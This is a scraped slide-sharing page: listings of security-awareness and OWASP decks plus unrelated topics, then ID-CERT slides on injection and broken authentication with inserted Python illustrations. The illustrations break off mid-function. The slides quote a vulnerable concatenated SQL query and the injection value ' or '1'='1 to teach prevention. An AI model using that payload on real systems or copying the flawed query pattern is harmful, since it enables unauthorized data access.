This document provides an overview of web security. It discusses how 30,000 websites are hacked every day using free hacking tools available online. It notes that SQL injection attacks on Sony led to a data breach of 77 million users. The document introduces OWASP and its top 10 web vulnerabilities. It provides details on the top vulnerability of injection flaws, how they occur, and ways to prevent them such as input validation and output encoding. Broken authentication and sensitive data exposure are also summarized as top vulnerabilities.
The document discusses various cybersecurity attack vectors and how organizations can protect themselves. It outlines common attack methods like ransomware, malicious code delivery, social engineering, and phishing. It then recommends that organizations conduct regular security audits, establish governance policies, create an incident response plan, and provide cybersecurity education to employees. The document promotes cybersecurity services from Future Point of View including vulnerability testing, forensics, and training to help organizations enhance their protections.
Infections cost organizations billions of dollars in lost time and productivity, as well as ransom payments and other indirect costs, like damage to a business’s reputation.
End-users will learn about password management, multi-factor authentication and how to secure their laptops and desktops while working remotely.
This session will teach professionals how to avoid becoming a statistic.
Agenda: Foundations of security awareness | Common threats | Three ways to secure your work environment | Best practices for users | The work from home checklist
Application misconfiguration attacks exploit weaknesses in web applications caused by configuration mistakes. These mistakes include using default passwords and privileges or revealing too much debugging information. Misconfiguration can have minor effects but can also cause major issues like data loss or full system compromise. It is a common problem caused by factors like human error and complex application interfaces. Proper security practices like regular reviews and testing can help detect and prevent misconfiguration vulnerabilities.
This month, Community IT presents basic IT security training for end users. Learn about common threats and the best techniques for dealing with them. This webinar is intended for a broad audience of both technical and non-technical staff.
1) Employee training and awareness is a critical element for cybersecurity resilience. Successful programs focus on changing employee behavior and aligning security practices both inside and outside of work.
2) Traditional awareness programs often fail because they are not engaging for employees and do not lead to real behavior change. Effective programs treat security messaging like marketing and use multiple channels, contexts, and reminders to reinforce the message.
3) Measuring outcomes is important for security awareness programs. Objectives should be clearly defined and focused on discrete, measurable goals rather than vague concepts like "increasing awareness."
End users face common cybersecurity threats such as phishing attacks, ransomware, password reuse, using unpatched devices, lack of remote security, data leakage via social media, and disabling security controls. Key security measures for end users include setting administrator privileges, downloading and installing security updates, installing antivirus software, activating firewalls, using multi-factor authentication, and creating regular backups. Security awareness is important for end users to avoid risks to company assets from security lapses.
This document provides an overview and objectives for an information security awareness training. It covers topics like electronic communication, email viruses, phishing, internet usage, social networking, password management, and physical security. The training aims to help users understand cybersecurity threats, how to safely use technology, and their role in protecting company information assets. It emphasizes the importance of having strong, unique passwords and avoiding opening attachments or clicking links from unknown sources.
Cyber Security Awareness Training by Win-Pro (Ronald Soh)
This document provides an overview of cyber security awareness training. It defines cyber security as protecting internet-connected systems from cyberattacks. Information security aims to maintain confidentiality, integrity, and availability of data. Modern threats include viruses, worms, Trojans, logic bombs, rootkits, botnets, and social engineering. Social engineering manipulates people into revealing information or gaining access. The document provides best practices for strong passwords, protecting devices and information, identifying compromises, and reporting issues. It concludes with alerts on cyber security agencies and questions.
The document provides definitions and concepts related to application security including assets, threats, vulnerabilities, attacks, and security controls. It discusses how application security aims to secure the confidentiality, integrity, and availability of data by protecting against vulnerabilities like SQL injection and cross-site scripting. The document demonstrates how attackers can exploit vulnerabilities in multiple phases, from information gathering to maintaining access. It recommends best practices for developers like following security standards, conducting audits, implementing logging, and keeping software updated. Finally, it discusses Facebook's response to the Cambridge Analytica data privacy scandal.
Introduction to Ethical Hacking, Life cycle of Hacking, Introduction to Penetration Testing, Steps in Penetration Testing, Footprinting Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) SQL Injection c) Cross-site Scripting d) File Upload Vulnerability (Web Server Hacking), Countermeasures for Securing Web Applications
This document provides training on cybersecurity best practices for Borough of West Chester personnel. It defines cybersecurity as protecting information and systems from unauthorized access, use, disclosure, disruption or destruction. It outlines common cyber threats like viruses, worms, ransomware, and social engineering. It emphasizes using strong passwords, antivirus software, firewalls, and regular software updates. It also recommends avoiding malicious emails and websites, and backing up important data.
How To Learn The Network Security
The following slides contain the fundamentals for understanding the concept of computer network security, from the perspective of infrastructure, technology, and the paradigm for users.
The material was prepared by an expert who is a CEH trainer and is genuinely competent in the field of network security.
I obtained these slides from him while attending his Certified Computer Security Officer (CCSO) and Certified Computer Security Analyst (CCSA) training.
Hopefully this is useful as a reference for us to learn about computer network security.
Thank you
As the industry’s first Secure Internet Gateway in the cloud, Cisco Umbrella provides the first line of defense against threats on the internet, protecting all your users within minutes.
Cisco Advanced Malware Protection offers global threat intelligence, advanced sandboxing and real-time malware blocking to prevent breaches while it continuously analyzes file activity across your network, so that you can quickly detect, contain and remove advanced malware.
Presentation of Cisco Security Architecture and Solutions such as Cisco Advanced Malware Protection (AMP) and Cisco Umbrella during Simplex-Cisco Technology Session that took place at the Londa Hotel in Limassol on 14 March 2018.
This document provides tips for safely using computers and the internet. It recommends keeping software updated, using antivirus software, firewalls, and strong passwords. It also suggests using private browsing, HTTPS, and ad blockers when surfing the internet. When using social media and email, it advises only giving permissions to trusted applications and being wary of unknown links or downloads. Basic tips for protecting identity and banking information are also included.
This document discusses network security and penetration testing. It provides an overview of creating a networking lab and the tools used, including Cisco Packet Tracer, Backtrack, Metasploit, and Wireshark. The document then covers network security topics like common network threats, router security, switch security, and port security. It defines penetration testing and explains its goals of finding vulnerabilities and recommending improvements. The phases of penetration testing are outlined as profiling, enumeration, vulnerability analysis, exploitation, and reporting. Different styles of penetration testing like blue team and red team are also summarized.
This document provides an overview of information security awareness training from Mount Auburn Hospital. It covers protecting electronic protected health information at work and at home. Key points include understanding what PHI is and why security is important. It describes potential security threats like malware, social engineering, and data theft. Guidelines are provided for secure practices like strong passwords, email safety, and disposing of media properly. Tips for securing data at home involve using antivirus software, backups, and safe internet practices. The goal is to protect patient privacy and comply with HIPAA security requirements.
This document provides an overview of information technology security awareness training at Northern Virginia Community College. It aims to assist faculty and staff in safely using computing systems and data by understanding security threats and taking reasonable steps to prevent them. Everyone who uses a computer is responsible for security. New employees must complete training within 30 days, and refresher training is required annually. Users have personal responsibilities around reporting violations, securing devices and data, and safe email practices. Security violations can result in consequences like data loss, costs, and disciplinary action. Training must be documented and various delivery methods are outlined.
The document provides tips for keeping a network secure, including always keeping virus software and Windows updates enabled, using firewalls, backing up data regularly, and using strong passwords. It warns about common password risks like using obvious words or writing passwords down. The document also covers securing laptops, email, wireless networks, and avoiding risks from open networks. Proper authentication, surge protection, and password protecting are emphasized as important security best practices.
Phishing involves attempting to acquire sensitive information like usernames, passwords, and credit card details by masquerading as a trustworthy entity. Common phishing techniques include email spoofing and creating fake websites that look identical to legitimate ones. Phishing can be prevented by being wary of unsolicited requests for information, verifying website URLs, using security software, and reporting any suspicious activity.
This document provides an overview of an awareness training for executives on information security. It discusses:
1) Conducting a security assessment of the company's people, processes, and technology to understand current vulnerabilities. Assessments can be done internally or through a third party and usually take 90 days.
2) Expecting security threats to become more complex and widespread globally as web applications and hacker motivations evolve.
3) Tips for executives including conducting security assessments promptly and staying aware of the latest hacker techniques.
Here are the key advantages of a packet-filtering router firewall:
- Simple and fast - Packet filtering is a simple and fast operation as it only examines packet headers. This makes packet filtering routers suitable for high traffic networks.
- Low cost - Packet filtering routers are generally lower in cost compared to other firewall types as they utilize existing router hardware and software.
- Flexible rulesets - Packet filtering allows for flexible rulesets that can block or allow packets based on many header fields like source/destination IP, port, protocol type etc.
- Transparency - Packet filtering operates at the network/transport layers so it is transparent to users and applications.
- Performance - Packet filtering has minimal impact on network performance since
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
Building An Information Security Awareness Program (Bill Gardner)
Most organizations’ Security Awareness Programs suck. They involve ‘canned’ video presentations or someone in HR explaining computer use policies. Others are extremely expensive and beyond the reach of the budgets of smaller organizations. This talk will show you how to build a Security Awareness Program from scratch for little or no money, and how to engage your users so that they get the most out of the program.
The document discusses Android security and provides an overview of key topics. It begins with Android basics and versions. It then covers the Android security model including application sandboxing and permissions. It defines Android applications and their components. It discusses debates on whether Android is more secure than iOS and outlines multiple layers of Android security. It also addresses Android malware, anti-virus effectiveness, rooting, application vulnerabilities, and security issues.
Employee Awareness in Cyber Security - Kloudlearn (KloudLearn)
The goal of employee awareness in cybersecurity is to make employees aware of the procedures, policies, guidelines, and practices for configuring, managing, and executing cybersecurity in the organization.
Content:
What is phishing, history, how it works, statistics, types of phishing, how to identify it, how to take countermeasures, phishing kit, example of phishing attack.
Effective security awareness training should address the basic needs of the organization and its employees. It should also be engaging and interactive, using a variety of formats such as videos, quizzes, simulations, and case studies.
The OWASP Top Ten is an expert consensus of the most critical web application security threats. If properly understood, it is an invaluable framework to prioritize efforts and address flaws that expose your organization to attack.
This webcast series presents the OWASP Top 10 in an abridged format, interpreting the threats for you and providing actionable offensive and defensive best practices. It is ideal for all IT/development stakeholders that want to take a risk-based approach to Web application security.
The How to Test for the OWASP Top Ten webcast focuses on telltale markers of the OWASP Top Ten and techniques to hunt them down:
• Vulnerability anatomy – how they present themselves
• Analysis of vulnerability root cause and protection schemas
• Test procedures to validate susceptibility (or not) for each threat
The document summarizes the top 10 security risks from the OWASP Top 10 - 2017 list. It describes each risk, including Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, Using Components with Known Vulnerabilities, and Insufficient Logging & Monitoring. For each risk, it covers the potential impacts, how to detect flaws, and ways to prevent vulnerabilities. The document provides an overview of the most critical web application security risks.
A series of Cyber security lecture notes.
(Endpoint, Server, and Device Security), (Identity, Authentication, and Access Management)
(Data Protection and Cryptography)
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner... (Michael Pirnat)
This document provides an agenda for a session on exploiting and mitigating the top 10 web application vulnerabilities according to OWASP. The session will run from 9:00 AM to 12:20 PM with a 20 minute break at 10:50 AM and a lunch break from 12:20 PM to 1:20 PM. The session will discuss injection attacks, broken authentication and session management, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing function level access control, cross-site request forgery, using known vulnerable components, and unvalidated redirects and forwards. Prevention strategies and Django-specific advice will also be provided for each vulnerability.
The document provides guidelines for secure coding. It discusses the evolution of software markets and increased security threats. Common web attacks like injection, broken authentication, and sensitive data exposure are explained. The OWASP Top 10 list of vulnerabilities is reviewed. The document emphasizes the importance of secure coding practices like input validation, output encoding, and using components with no known vulnerabilities. Following a secure coding lifestyle can help developers write more secure code and protect against attacks.
The document discusses computer security and common cyber attack vectors. It defines key terms like attack surface, attack vectors, and security breaches. It then describes 8 common attack vectors: compromised credentials, weak/stolen credentials, malicious insiders, missing/poor encryption, misconfiguration, ransomware, phishing, and trust relationships. Typical symptoms of an attack are also listed, such as slow performance, strange files/programs, and automatic messages. The consequences of a successful attack compromise the goals of computer security - confidentiality, integrity and availability.
Ethical Hacking Concepts and Scopes, Threats and Attack Vectors, Information Assurance, Threat Modelling
Enterprise Information Security Architecture, Vulnerability
Assessment and Penetration Testing
Types of Social Engineering, Insider Attack, Preventing Insider
Threats, Social Engineering Targets and Defence Strategies
Talk on threats to database security. The title is, of course, deadly serious. Wile E. Coyote & other experts on correctness & security are enlisted to help make key points.
ETHICAL HACKING AND SOCIAL ENGINEERING
Topics Covered: Ethical Hacking Concepts and Scopes, Threats and Attack Vectors, Information Assurance, Threat Modelling, Enterprise Information Security Architecture, Vulnerability, Assessment and Penetration Testing, Types of Social Engineering, Insider Attack, Preventing Insider Threats, Social Engineering Targets and Defence Strategies
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap... (IBM Security)
View the on-demand recording: http://securityintelligence.com/events/avoiding-application-attacks/
Your organization is running fast to build your business. You are developing new applications faster than ever and utilizing new cloud-based development platforms. Your customers and employees expect applications that are powerful, highly usable, and secure. Yet this need for speed coupled with new development techniques is increasing the likelihood of security issues.
How can you meet the needs of speed to market with security? Hear Paul Ionescu, IBM Security, Ethical Hacking Team Lead discuss:
- How application attacks work
- Open Web Application Security Project (OWASP) goals
- How to build defenses into your applications
- The 10 most common web application attacks, including demos of the infamous Shellshock and Heartbleed vulnerabilities
- How to test for and prevent these types of threats
Hacking involves identifying and exploiting weaknesses in computer systems to gain unauthorized access, while ethical hacking (also called penetration testing or white-hat hacking) involves using the same tools and techniques as hackers but legally and without causing damage. There are different types of hackers, including black hat hackers who use their skills maliciously, white hat hackers who use their skills defensively, and grey hat hackers whose behavior cannot be predicted. Ethical hacking is important for evaluating security and reporting vulnerabilities to owners.
Organizations are increasingly looking to their Internal Auditors to provide independent assurance about cyber risks and the organization's ability to defend against cyber attacks. With information technology becoming an inherent critical success factor for every business and the emerging cyber threat landscape, every internal auditor needs to equip themselves on IT audit essentials and cyber issues.
In part 12 of our Cyber Security Series you will learn about the current cyber risks and attack methods from Richard Cascarino, including:
Where are we now and Where are we going?
Current Cyberrisks
• Data Breach and Cloud Misconfigurations
• Insecure Application Programming Interfaces (APIs)
• The growing impact of AI and ML
• Malware Attack
• Single factor passwords
• Insider Threat
• Shadow IT Systems
• Crime, espionage and sabotage by rogue nation-states
• IoT
• CCPA and GDPR
• Cyber attacks on utilities and public infrastructure
• Shift in attack vectors
Secure Coding BSSN Semarang Material.pdf (nanangAris1)
This document provides an introduction to application security. It discusses why security is important and how applications can become vulnerable. It outlines common application security attacks like SQL injection, cross-site scripting, and denial-of-service attacks. It also discusses software security standards, models and frameworks like OWASP that can help make applications more secure. The document emphasizes the importance of secure coding practices and security testing to prevent vulnerabilities.
IBM i is securable BUT not secured by default. To help protect your organization from the increasing security threats, you must take control of all access points to your IBM i server. You can limit IBM i security threats by routinely assessing your risks and taking control of logon security, powerful authorities, and system access.
With the right tools and process, you can assure comprehensive control of unauthorized access and can trace any activity, suspicious or otherwise, on your IBM i systems.
Watch this on-demand webcast to learn:
• How to secure network access and communication ports
• How to implement different authentication options and tradeoffs
• How to limit the number of privileged user accounts
• How Precisely’s Assure Security can help
OWASP features in secure coding techniques (Sri Latha)
The document outlines the top 10 vulnerabilities according to OWASP: 1) Injection, 2) Broken Authentication & Session Management, 3) Sensitive Data Exposure, 4) XML External Entities, 5) Broken Access Control, 6) Security Misconfiguration, 7) Cross-Site Scripting, 8) Insecure Deserialization, 9) Using Components with Known Vulnerabilities, and 10) Insufficient Logging & Monitoring. Each vulnerability is briefly described, with Injection being the most common issue that allows hostile data to execute unintended commands. Broken Authentication, Sensitive Data Exposure, and Cross-Site Scripting are also major risks. Proper logging and monitoring is important to detect attacks.
Covers security and privacy issues for software product developers including attacks and defenses, encryption, authentication, authorisation and data protection
Expand Your Control of Access to IBM i Systems and Data (Precisely)
This document discusses expanding control of access to IBM i systems and data. It begins with some logistical information about the webcast. The presentation will discuss myths about IBM i security, exit points and access methods, examples of security issues, and how Syncsort can help with security. The agenda includes discussing the myth that IBM i is secure by nature, reviewing exit points and access methods, providing examples, and explaining how Syncsort can help manage security risks. Overall, the document aims to educate about security risks on IBM i and how third party solutions can help address vulnerabilities from various access methods and improve overall security.
Guest lecture on web application security, presented to students at the Indianapolis campus of The Iron Yard on November 9, 2016. This presentation was a basic overview/introduction to security, discussed the CIA Triad, why security is difficult, what happens if we don't do security right, what developers can do to enhance security, and included a brief overview of the OWASP Top Ten.
The summary of this document is a comparison of the 2016 and 2020 curricula and the preparation for online lectures for the D3 TK program. The document discusses the differences between the curricula, the course equivalence table, and the registration scenarios for students of the 2018 and 2019 cohorts under the new curriculum.
This document provides an introduction and overview of the Diploma of Computer Engineering program at Telkom University. It discusses the history and profile of graduates from the program, which includes careers in fields like network engineering, hardware engineering, and entrepreneurship. It also outlines the curriculum, requirements to graduate, available laboratories and research groups, student achievements in competitions, and links to additional online resources.
This document provides information about Capture The Flag (CTF) on the ctf.live site. CTF is used to learn network security through challenges such as finding a flag on a target server using commands such as Nmap and SSH. Participants must register, choose a difficulty level, start the server, find the target IP, collect the flag, and report the steps they took.
The document discusses wireless network and web application security, including wifi hacking techniques, wireless encryption, attacks on servers and web applications such as injection and XSS, and how to prevent them.
This document discusses techniques for gaining access to a target system after footprinting and scanning have been done. Some of the techniques mentioned are password cracking, social engineering, and executing applications to gain access to the target system. The document also discusses various ways to strengthen password security so that passwords are hard to crack.
This course discusses the basic concepts of network security, including security aspects such as confidentiality, integrity, and availability of data. Students will learn network attack and defense techniques, and build network defense systems.
This document discusses remastering a Linux distro, where students are asked to choose a theme and change the appearance and application packages of a Linux distro to match that theme. Students must include a report and a presentation of their remastering results and will be graded on the distro's appearance, documentation, and presentation. Some tools that can be used for remastering are Linux Respin, Linux Live Kit, Ubuntu Imager, and M
This document is the course module for the Operating Systems course, covering information about the course such as the course code, credits, prerequisites, lecturer, lecture rules, session materials, lab rules, grading rules, and references.
IDS and IPS are used to detect and prevent network security incidents. An IDS only detects and reports incidents, while an IPS can detect and also stop incidents by blocking access. The detection methods used include signature-based and anomaly-based detection, to catch known attack patterns as well as abnormal behaviour. Examples of commercial IPS products are Cisco FirePower, HP NGIPS,
Main Java [All of the Base Concepts].docx (adhitya5119)
This is part 1 of my Java Learning Journey. This contains custom methods, classes, constructors, packages, multithreading, try-catch blocks, finally blocks and more.
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) Curriculum (MJDuyan)
(TLE 100) (Lesson 1) - Prelims
Discuss the EPP Curriculum in the Philippines:
- Understand the goals and objectives of the Edukasyong Pantahanan at Pangkabuhayan (EPP) curriculum, recognizing its importance in fostering practical life skills and values among students. Students will also be able to identify the key components and subjects covered, such as agriculture, home economics, industrial arts, and information and communication technology.
Explain the Nature and Scope of an Entrepreneur:
- Define entrepreneurship, distinguishing it from general business activities by emphasizing its focus on innovation, risk-taking, and value creation. Students will describe the characteristics and traits of successful entrepreneurs, including their roles and responsibilities, and discuss the broader economic and social impacts of entrepreneurial activities on both local and global scales.
Leveraging Generative AI to Drive Nonprofit Innovation (TechSoup)
In this webinar, participants learned how to utilize Generative AI to streamline operations and elevate member engagement. Amazon Web Services experts provided customer-specific use cases and dived into low/no-code tools that are quick and easy to deploy through Amazon Web Services (AWS).
How to Make a Field Mandatory in Odoo 17 (Celine George)
In Odoo, making a field required can be done through both Python code and XML views. When you set the required attribute to True in Python code, it makes the field required across all views where it's used. Conversely, when you set the required attribute in XML views, it makes the field required only in the context of that particular view.
Temple of Asclepius in Thrace. Excavation results (Krassimira Luka)
The temple and the sanctuary around were dedicated to Asklepios Zmidrenus. This name has been known since 1875 when an inscription dedicated to him was discovered in Rome. The inscription is dated in 227 AD and was left by soldiers originating from the city of Philippopolis (modern Plovdiv).
LAND USE LAND COVER AND NDVI OF MIRZAPUR DISTRICT, UP (RAHUL)
This Dissertation explores the particular circumstances of Mirzapur, a region located in the
core of India. Mirzapur, with its varied terrains and abundant biodiversity, offers an optimal
environment for investigating the changes in vegetation cover dynamics. Our study utilizes
advanced technologies such as GIS (Geographic Information Systems) and Remote sensing to
analyze the transformations that have taken place over the course of a decade.
The complex relationship between human activities and the environment has been the focus
of extensive research and worry. As the global community grapples with swift urbanization,
population expansion, and economic progress, the effects on natural ecosystems are becoming
more evident. A crucial element of this impact is the alteration of vegetation cover, which plays a
significant role in maintaining the ecological equilibrium of our planet.
Land serves as the foundation for all human activities and provides the necessary materials for
these activities. As the most crucial natural resource, its utilization by humans results in different
'Land uses,' which are determined by both human activities and the physical characteristics of the
land.
The utilization of land is impacted by human needs and environmental factors. In countries
like India, rapid population growth and the emphasis on extensive resource exploitation can lead
to significant land degradation, adversely affecting the region's land cover.
Therefore, human intervention has significantly influenced land use patterns over many
centuries, evolving its structure over time and space. In the present era, these changes have
accelerated due to factors such as agriculture and urbanization. Information regarding land use and
cover is essential for various planning and management tasks related to the Earth's surface,
providing crucial environmental data for scientific, resource management, policy purposes, and
diverse human activities.
Accurate understanding of land use and cover is imperative for the development planning
of any area. Consequently, a wide range of professionals, including earth system scientists, land
and water managers, and urban planners, are interested in obtaining data on land use and cover
changes, conversion trends, and other related patterns. The spatial dimensions of land use and
cover support policymakers and scientists in making well-informed decisions, as alterations in
these patterns indicate shifts in economic and social conditions. Monitoring such changes with the
help of advanced technologies like Remote Sensing and Geographic Information Systems is
crucial for coordinated efforts across different administrative levels.
Changes in vegetation cover refer to variations in the distribution, composition, and overall
structure of plant communities across different temporal and spatial scales. These changes can
occur natural.
4. ID-CERT
• Indonesia Computer Emergency Response Team
• 1998 – Dr. Budi Rahardjo
• Community based
• Incident Handling
• Malware Lab
• Research & Training about Malware
• Tools: Malware Scanner
• Founder AP-CERT: JP-CERT & AusCERT
www.cert.or.id/
6. • 30,000 websites are hacked every day
• Hundreds of free tools are available on the internet for hacking a website
• 70% of attacks come through web applications
• Web vulnerability
7. • SQL injection attack on Sony by LulzSec
• Leaked the data of 77 million users
• 1 month shutdown
• $171 million
8. • CSS vulnerability in the Android Market
• Allowed an attacker to remotely install apps onto a user's Android device
9. We Are Secure, We Have a Firewall
• Myth about Firewall
• Closed off ports
13. OWASP Top 10
• Open Web Application Security Project
• Open source project for improving web application security
• Individual contributors, company sponsors, volunteers
• Secure Coding, library
• Tools, scanner, vulnerable lab
• Top Ten List
14. OWASP Top Ten
• 2004
• 2007
• 2010
• 2013
• 2017
16. 1. Injection
• Affects SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries.
• Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query.
• The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
17. Injection
• Injection flaws are easy to discover when examining code.
• Scanners and fuzzers can help attackers find injection flaws.
• Injection can result in data loss, corruption, or disclosure to
unauthorized parties, loss of accountability, or denial of access.
• Injection can sometimes lead to complete host takeover.
18. An application is vulnerable to attack when:
• User-supplied data is not validated, filtered, or sanitized by the
application.
• Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter.
• Hostile data is used within object-relational mapping (ORM) search
parameters to extract additional, sensitive records.
• Hostile data is directly used or concatenated, such that the SQL or
command contains both structure and hostile data in dynamic
queries, commands, or stored procedures.
19. Defense
• Source code review
• Automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs
• Integrate static application security testing (SAST) and dynamic application security testing (DAST) tools into the CI/CD pipeline
20. How to Prevent
• Use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface, or migrate to Object Relational Mapping Tools (ORMs).
• Use positive or "whitelist" server-side input validation.
• For any residual dynamic queries, escape special characters using the
specific escape syntax for that interpreter.
• Use LIMIT and other SQL controls within queries to prevent mass
disclosure of records in case of SQL injection.
21. Example Attack Scenarios
• Scenario #1: An application uses untrusted data in the construction of
the following vulnerable SQL call:
• String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'";
• Scenario #2: Similarly, an application’s blind trust in frameworks may
result in queries that are still vulnerable, (e.g. Hibernate Query
Language (HQL)):
• Query HQLQuery = session.createQuery("FROM accounts WHERE
custID='" + request.getParameter("id") + "'");
22. Attack
• In both cases, the attacker modifies the ‘id’ parameter value in their
browser to send: ' or '1'='1. For example:
• http://example.com/app/accountView?id=' or '1'='1
• This changes the meaning of both queries to return all the records
from the accounts table.
• More dangerous attacks could modify or delete data, or even invoke
stored procedures.
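As an added illustration of slides 16 to 22 (my own example, not code from the ID-CERT talk), the following Python script reproduces the vulnerable concatenated query next to the parameterized, validated and LIMIT-protected versions the prevention slides call for, using a constructed in-memory SQLite table. The customer ID format (1 to 10 digits) and the table columns are assumptions; the payload is the one from slide 22.

```python
import re
import sqlite3

# Constructed sample data (not from the talk): an accounts table in an in-memory SQLite database.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1001", "alice", 500), ("1002", "bob", 1200), ("1003", "carol", 80)],
    )
    return conn

def lookup_concatenated(conn, cust_id):
    # Vulnerable: the same pattern as the talk's
    #   String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
    # Structure and hostile data are mixed into one string, so the interpreter cannot tell them apart.
    query = "SELECT custID, owner, balance FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()

def lookup_concatenated_limited(conn, cust_id):
    # Still vulnerable, but LIMIT 1 (slide 20) caps mass disclosure to a single record.
    query = "SELECT custID, owner, balance FROM accounts WHERE custID='" + cust_id + "' LIMIT 1"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, cust_id):
    # Safe API: the query text is fixed and the value travels separately as a bound parameter,
    # so "' or '1'='1" is compared literally against custID and matches nothing.
    query = "SELECT custID, owner, balance FROM accounts WHERE custID=?"
    return conn.execute(query, (cust_id,)).fetchall()

CUST_ID_PATTERN = re.compile(r"[0-9]{1,10}")   # assumed business rule: customer IDs are 1-10 digits

def is_valid_cust_id(value):
    # Positive ("whitelist") server-side validation: reject anything that is not a plain numeric ID.
    return CUST_ID_PATTERN.fullmatch(value) is not None

def account_view(conn, cust_id):
    # The hardened handler: validate first, then use the parameterized lookup.
    if not is_valid_cust_id(cust_id):
        raise ValueError("invalid customer id")
    return lookup_parameterized(conn, cust_id)

if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"    # the value from slide 22
    print("concatenated:", lookup_concatenated(db, payload))          # every account leaks
    print("with LIMIT 1:", lookup_concatenated_limited(db, payload))  # one record at most
    print("parameterized:", lookup_parameterized(db, payload))        # []
```

Running it shows the three outcomes side by side: the concatenated query returns all three rows, the LIMIT variant returns one, and the parameterized query returns nothing because the payload is treated as an ordinary string value.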
24. 2. Broken Authentication
• Attackers have access to hundreds of millions of valid username and
password combinations for credential stuffing, default administrative
account lists, automated brute force, and dictionary attack tools.
• Session management attacks are well understood, particularly in
relation to unexpired session tokens.
• The prevalence of broken authentication is widespread due to the
design and implementation of most identity and access controls.
• Session management is the bedrock of authentication and access
controls, and is present in all stateful applications.
25. Broken Authentication
• Attackers can detect broken authentication using manual means and exploit it using automated tools with password lists and dictionary attacks.
• Attackers have to gain access to only a few accounts, or just one
admin account to compromise the system.
• Depending on the domain of the application, this may allow money
laundering, social security fraud, and identity theft, or disclose legally
protected highly sensitive information.
26. Is the Application Vulnerable?
• Permits automated attacks such as credential stuffing, where the
attacker has a list of valid usernames and passwords.
• Permits brute force or other automated attacks.
• Permits default, weak, or well-known passwords, such as "Password1" or "admin/admin".
• Uses weak or ineffective credential recovery and forgot-password processes, such as "knowledge-based answers", which cannot be made safe.
27. Broken Authentication Vulnerable
• Uses plain text, encrypted, or weakly hashed passwords (see
A3:2017-Sensitive Data Exposure).
• Has missing or ineffective multi-factor authentication.
• Exposes Session IDs in the URL (e.g., URL rewriting).
• Does not rotate Session IDs after successful login.
• Does not properly invalidate Session IDs. User sessions or authentication tokens (particularly single sign-on (SSO) tokens) aren’t properly invalidated during logout or a period of inactivity.
28. How to Prevent
• Implement multi-factor authentication to prevent automated credential stuffing, brute force, and stolen credential re-use attacks.
• Do not ship or deploy with any default credentials, particularly for
admin users.
• Implement weak-password checks, such as testing new or changed
passwords against a list of the top 10000 worst passwords.
29. Defense
• Align password length, complexity and rotation policies with NIST 800-63B's guidelines in section 5.1.1 for Memorized Secrets or other modern, evidence-based password policies.
• Ensure registration, credential recovery, and API pathways are hardened
against account enumeration attacks by using the same messages for all
outcomes.
• Limit or increasingly delay failed login attempts. Log all failures and alert
administrators when credential stuffing, brute force, or other attacks are
detected.
• Use a server-side, secure, built-in session manager that generates a new random session ID with high entropy after login. Session IDs should not be in the URL, should be securely stored, and should be invalidated after logout, idle, and absolute timeouts.
30. Example Attack Scenarios
• Scenario #1: Credential stuffing, the use of lists of known passwords,
is a common attack.
• If an application does not implement automated threat or credential
stuffing protections, the application can be used as a password oracle
to determine if the credentials are valid.
• Scenario #2: Most authentication attacks occur due to the continued
use of passwords as a sole factor.
• Once considered best practices, password rotation and complexity
requirements are viewed as encouraging users to use, and reuse,
weak passwords. Organizations are recommended to stop these
practices per NIST 800-63 and use multi-factor authentication.
31. Attack
• Scenario #3: Application session timeouts aren’t set properly.
• A user uses a public computer to access an application.
• Instead of selecting “logout” the user simply closes the browser tab
and walks away.
• An attacker uses the same browser an hour later, and the user is still
authenticated.
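An added example of the prevention points on slides 28 to 30 and the session-timeout scenario on slide 31 (my own illustration, not the talk's code): a small authentication service that rejects blocklisted passwords, returns the same failure message whether or not the user exists, applies an increasing delay after failed logins and records an alert after repeated failures, issues a fresh high-entropy session ID after each login, and expires sessions on idle and absolute timeouts. The denylist, timeout values, hashing parameters and back-off schedule are constructed assumptions; a FakeClock stands in for real time so the timeouts can be demonstrated without waiting.

```python
import hashlib
import hmac
import secrets
import time

# Constructed denylist standing in for the "top 10000 worst passwords" list the talk recommends.
WEAK_PASSWORDS = {"password", "password1", "123456", "qwerty", "admin", "letmein", "welcome"}
GENERIC_FAILURE = "Invalid username or password"   # one message for every failure outcome

def is_weak_password(password):
    # NIST 800-63B style check: a minimum length plus a blocklist, no composition rules.
    return len(password) < 8 or password.lower() in WEAK_PASSWORDS

class FakeClock:
    """Controllable clock so timeouts can be demonstrated without waiting."""
    def __init__(self, start=1000.0):
        self.now = start
    def __call__(self):
        return self.now

class AuthService:
    IDLE_TIMEOUT = 15 * 60         # seconds of inactivity before a session dies (scenario #3)
    ABSOLUTE_TIMEOUT = 8 * 3600    # hard cap on session lifetime
    ALERT_THRESHOLD = 5            # failures per account before administrators are alerted

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.users = {}       # username -> (salt, pbkdf2 hash)
        self.failures = {}    # username -> (failure count, time until which logins are refused)
        self.sessions = {}    # session id -> {"user", "created", "last_seen"}
        self.alerts = []      # what would be sent to administrators

    @staticmethod
    def _hash(password, salt):
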